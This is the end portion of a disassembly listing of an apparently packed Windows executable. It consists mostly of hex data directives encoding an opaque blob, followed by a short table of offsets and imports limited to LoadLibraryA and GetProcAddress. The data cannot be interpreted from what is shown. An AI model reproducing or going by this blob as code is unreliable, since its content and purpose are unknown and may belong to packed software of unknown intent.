dd 0D4544450h, 0EF4E451Ch, 356DE499h, 0D6EA7829h, 4353A522h
dd 0DC279D3Bh, 45A5BDEFh, 7F9E3791h, 9770FDFEh, 904DCC93h
dd 0A74A9304h, 45051570h, 1B165352h, 474CA806h, 271ABE08h
dd 0D28E4BAAh, 0FE20409Bh, 0EBFEFB61h, 76307524h, 7378A94Ch
dd 9D7661C8h, 470CB608h, 0A6651543h, 254D3E85h, 3E0A656Bh
dd 61543475h, 6378CE1Eh, 0CC664120h, 0DE25BEC5h, 0F5094027h
dd 1B533E85h, 64BE104Dh, 10505837h, 92776632h, 3F6928Eh
dd 34564108h, 34CC6B28h, 428D12BCh, 72674D31h, 444E9098h
dd 0C62A63DBh, 70DBF742h, 8CA3FFBCh, 8ED8B774h, 3D9D954h
dd 0C70F3A4Ch, 6DE1B355h, 0D6078C0Dh, 0BC6CCFFFh, 449E8829h
dd 7DB1CFAAh, 541410A1h, 2BEE58A7h, 6D061064h, 0EB6C7563h
dd 2C10D8A3h, 74421CF5h, 0C5424C4h, 771E6C88h, 94AC647Eh
dd 11331DB9h, 9C28FD45h, 46503D4Eh, 8DCA6E3Eh, 6DBA020Ch
dd 7029A4ECh, 4C64A066h, 8A462453h, 4F2840DAh, 5496C798h
dd 41401321h, 0E9376776h, 0C4CDECE3h, 4647E300h, 84EEAB77h
dd 2F521CD8h, 0FE1B756Fh, 0F86266E7h, 32344AFBh, 5934F04Bh
dd 786D045Ch, 0CACA541h, 667D430Ch, 414910DDh, 2B178F49h
dd 0C5F89F65h, 0C40FD44Fh, 9C346AD3h, 357D802Eh, 5C048A69h
dd 0B858FA98h, 3DAE42B3h, 482010C4h, 120FCFD6h, 5A6A624Fh
dd 10FA5ED8h, 329F579Ah, 0CBAD9291h, 641EAD74h, 0D46DA63Ah
dd 286C0D6Fh, 0C617495h, 8651572Ch, 1A6C435Fh, 9584DBFDh
dd 0D8F734F9h, 325C339Eh, 0C143D630h, 0BD524944h, 28570C4Fh
dd 6D01514Eh, 520E000h, 10195393h, 0AB391285h, 98101732h
dd 82BA5010h, 72680404h, 0F00199FFh, 29F1399Ch, 54555501h
dd 0E01CC895h, 7010C401h, 9600CA2h, 65DA468Ah, 27C2002h
dd 42BF8528h, 10E048BCh, 2F84648Fh, 818A2246h, 0B015902h
dd 824038F4h, 29002A5h, 263C46BFh, 5E551C20h, 0D4090169h
dd 74D32520h, 29060546h, 910C0BC0h, 9004231Dh, 248DF296h
dd 1E8E7208h, 90C88F43h, 210F9179h, 3C93E492h, 709C803h
dd 8C220A91h, 0D03FF68h, 0DC190218h, 0BB519FA4h, 911B099h
dd 28288412h, 10116019h, 11243412h, 12910448h, 22A3E010h
dd 18B44413h, 19127C89h, 1A485424h, 1B221C91h, 7CA2E42Dh
dd 11BC669Fh, 89AC7844h, 249C1279h, 918C487Ah, 448822FCh
dd 808878FFh, 16309370h, 13C1AEF0h, 9C675453h, 40AF44F8h
dd 0A0DDCCD0h, 0BDDE0C90h, 1CA190E5h, 47210C8h, 3B481E0Ch
dd 86D770AFh, 99764ECh, 91D448B5h, 0D5112AF3h, 4E093064h
dd 34A36D48h, 59223A11h, 9404774Dh, 0D3096454h, 1099F248h
dd 9912F51h, 456C264Dh, 0AE40F550h, 59014D08h, 0C09710A2h
dd 7C7D0213h, 259D200Bh, 0C2DFF095h, 4088A5Bh, 61F4B15Ch
dd 45080402h, 31D0AA08h, 0E4798260h, 2918A621h, 808DFA6h
dd 81C0A5A1h, 84FCE09Fh, 807E4010h, 0C161A8CCh, 4BDAA339h
dd 8111383Fh, 8408AFEh, 302EB565h, 0B6E441C8h, 0C5A2CF45h
dd 0E5A08392h, 5BC2E8B3h, 7E0A60B5h, 518C0AA1h, 72DA0905h
dd 5FC0CE5Eh, 32086ACFh, 0D8D3045Ch, 6F9E0DEh, 0BB747E31h
dd 8F16E5F4h, 803295Ch, 18250491h, 0D82009Bh, 9490624h
dd 0C44944Ch, 4708A608h, 1C0A2909h, 16F20B90h, 8053C9Ah
dd 1058320Fh, 12111499h, 4049A12h, 35722118h, 1C411099h
dd 50538E43h, 18522934h, 0CA085394h, 59656057h, 996C7C32h
dd 20126D18h, 1C487024h, 0CAAC7295h, 80653006h, 9981B472h
dd 204C8208h, 84538E83h, 44912248h, 10A69E29h, 2990A157h
dd 0A79170A4h, 0E5A0B7CAh, 0D72032CEh, 15241839h, 14FE10Ch
dd 0A6BEAAh, 17FDCh, 2 dup(0)
dd 1F2h, 17FDCh, 5 dup(0)
dd offset sub_401000
dd offset dword_412000
dd offset dword_40A620+18h
dd 0
dd offset off_417FCC
dd 80h, 7D00h, 12FFC4h
off_417FCC dd offset dword_400160+88h ; DATA XREF: seg002:00417FBC�o
dd offset dword_400160+7Ch
dd offset dword_400160+7Eh
dd offset sub_404200
dd 77E805D8h, 77E7A5FDh, 0
aLoadlibrarya db 'LoadLibraryA',0
align 2
aGetprocaddre_0 db 'GetProcAddress',0
align 1000h
seg002 ends
; Section 3. (virtual address 00019000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00019000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 419000h
align 2000h
_idata2 ends
end start